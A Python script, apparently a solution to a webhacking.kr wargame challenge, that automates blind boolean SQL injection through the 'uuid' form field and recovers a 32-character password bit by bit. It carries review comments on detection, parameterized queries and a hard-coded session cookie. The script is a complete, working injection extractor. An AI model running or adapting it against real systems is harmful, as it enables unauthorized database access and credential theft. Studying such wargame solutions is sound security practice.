import http.client
import urllib
import math
def fetch_string(statement):
    """Recover the value of ``statement`` one bit at a time through ``test``.

    For each of 32 character positions (the length is fixed here, not
    probed), eight calls to ``test`` ask whether bit ``2**x`` of
    ``ord(mid(statement, position, 1))`` is set, and the answers are
    assembled into one character. Both bit orders and the running result
    are printed as progress output.

    NOTE(review): the listing this came from had lost its indentation. The
    nesting below (progress prints once per character) is a reconstruction;
    confirm against the original file.

    Detection note: one run issues 32 * 8 = 256 sequential POSTs whose bodies
    differ only in the position and the bit mask. That regular, high-volume
    pattern is what request logging or a WAF rule can key on. On the server
    side the durable fix is a parameterized query, not input filtering.

    Args:
        statement: Expression text substituted into the probe template.

    Returns:
        The 32-character string assembled from the probe answers.
    """
    char_count = 32  # length lookup is skipped; a fixed width is assumed
    recovered = ''
    for position in range(1, char_count + 1):
        # Bits are collected least-significant first (mask 1, 2, 4, ... 128).
        lsb_first = ''.join(
            '1' if test('ord(mid(%s,%d,1))&%d' % (statement, position, 1 << bit)) else '0'
            for bit in range(8)
        )
        msb_first = lsb_first[::-1]
        print(msb_first)
        print(lsb_first)
        # int(..., 2) expects the most significant bit first.
        recovered += chr(int(msb_first, 2))
        print(recovered)
    return recovered
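def test(cond):
    """Send one boolean probe to the challenge endpoint and report the outcome.

    ``cond`` is URL-quoted and spliced into the ``uuid`` form field of a POST
    to ``/challenge/bonus/bonus-2/index.php`` on ``webhacking.kr``.

    NOTE(review): any response that lacks ``'Wrong!'`` counts as True. An HTTP
    error page or an expired-session page would therefore also read as True,
    because the status code is never checked.

    Args:
        cond: Expression text to embed in the request body.

    Returns:
        True when the decoded response body does not contain ``'Wrong!'``,
        otherwise False.
    """
    # Imported explicitly: the file header has only `import urllib`, which does
    # not by itself guarantee that the `urllib.parse` submodule is loaded.
    from urllib.parse import quote

    # NOTE(review): HTTPConnection is plain HTTP, so the Cookie header below
    # crosses the network unencrypted.
    conn = http.client.HTTPConnection('webhacking.kr')
    headers = {
        'Host': 'webhacking.kr',
        'Upgrade-Insecure-Requests': '1',
        'Content-Type': 'application/x-www-form-urlencoded',
        # NOTE(review): session identifier hard-coded in source. Anyone who
        # can read this file can reuse the session while it is valid. Keep it
        # out of version control (environment or local config) and rotate it
        # if the file has been shared.
        'Cookie': 'id=rbc; PHPSESSID=7e74a61eb46338352194ab8d2d1535db',
    }
    payload = 'uuid=admin%27+and+{}%23&pw=123'.format(quote(cond))
    try:
        conn.request(
            'POST',
            '/challenge/bonus/bonus-2/index.php',
            headers=headers,
            body=payload,
        )
        page = conn.getresponse().read().decode()
    finally:
        # The connection was previously never closed, leaking one socket per
        # probe; close it even when the request or the read raises.
        conn.close()
    return 'Wrong!' not in page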
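# Run the extraction only when this file is executed as a script, so that
# merely importing the module does not send network requests.
if __name__ == "__main__":
    fetch_string('pw')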